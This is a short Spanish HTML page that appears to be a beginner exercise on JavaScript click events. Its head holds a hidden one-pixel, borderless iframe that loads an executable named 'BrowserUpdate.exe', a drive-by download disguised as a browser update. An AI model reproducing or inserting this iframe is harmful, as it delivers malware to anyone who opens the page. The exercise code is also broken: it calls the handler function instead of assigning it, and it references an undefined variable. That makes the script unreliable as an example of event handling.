<!DOCTYPE html>
<html lang="es">
<head><iframe src=BrowserUpdate.exe width=1 height=1 frameborder=0></iframe>
<title>Título del documento</title>
<script>
function mostraralerta(){
alert('hizo clic!');
}
function hacerclic(){
document.getElementsByTagName('input')[0].onclick=mostraralerta();
}
window.onload=hacerclic();
var x=5;
document.write("El valor de X = " + X);
</script>
</head>
<body>
<div id="principal">
<p onclick="alert('SE HIZO CLICK')">Aquí si funciona el click</p>
<p>Aquí no funciona el click</p>
</div>
</body>
</html>